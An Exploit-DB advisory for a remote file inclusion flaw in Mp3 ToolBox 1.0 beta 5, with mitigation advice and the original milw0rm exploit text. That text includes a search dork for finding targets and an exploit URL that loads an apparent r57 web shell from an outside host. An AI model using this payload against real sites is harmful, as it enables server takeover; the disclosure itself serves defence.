Mp3 ToolBox 1.0 beta 5 Remote File Include Vulnerability

vendor:

Mp3 ToolBox

by:

Crackers_Child

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Mp3 ToolBox

Affected Version From: 1.0 beta 5

Affected Version To: 1.0 beta 5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Mp3 ToolBox 1.0 beta 5 Remote File Include Vulnerability

The Mp3 ToolBox 1.0 beta 5 script is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a malicious file from a remote server, which can lead to unauthorized access or execution of arbitrary code.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Mp3 ToolBox to a patched version that fixes the remote file inclusion vulnerability. Additionally, it is advised to validate and sanitize user-supplied input to prevent any malicious file inclusion.

Source

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       Mp3 ToolBox 1.0 beta 5
*    [~] Download.....:       http://www.radiotoolbox.com/downloads/mp3toolbox/mp3_toolbox_beta-5.zip
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote File Ä°nclude Vulnerability
*    [~] Dork.........:       intitle:Mp3 ToolBox 1.0
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*     
*
*       [~] Exploit Rfi...:     http://[Taget]/[Path]/index.php?skin_file=http://sibersavascilar.com/shelz/r57.txt?
*
*                             
+_______________________________________________________________________________________________________________________+



        [~] Vulnerable......:   include($skin_file);
                      



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-11-23]